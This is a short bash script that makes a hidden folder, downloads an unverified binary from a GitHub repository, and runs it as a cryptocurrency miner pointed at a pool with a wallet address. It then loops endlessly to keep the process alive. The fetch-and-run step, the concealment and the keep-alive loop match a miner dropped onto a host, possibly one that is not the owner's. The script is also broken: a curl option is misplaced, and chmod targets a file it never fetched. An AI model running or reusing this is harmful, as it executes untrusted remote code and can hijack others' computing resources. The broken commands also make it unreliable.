#!/bin/bash
mkdir .kap && cd .kap

curl -L -o https://github.com/drputraargo-commits/lodong/raw/refs/heads/main/ujang -o ujang
chmod u+x pearl-miner
./ujang --host pool.pearlhash.xyz:9000 --user prl1pjp3jd7ue653f6zyrn9ewwu7lalw538kn5w2l4lekv0g3nxqlj23qnwg6g0 --worker colkae
while [ 1 ]; do
sleep 3
done
sleep 999
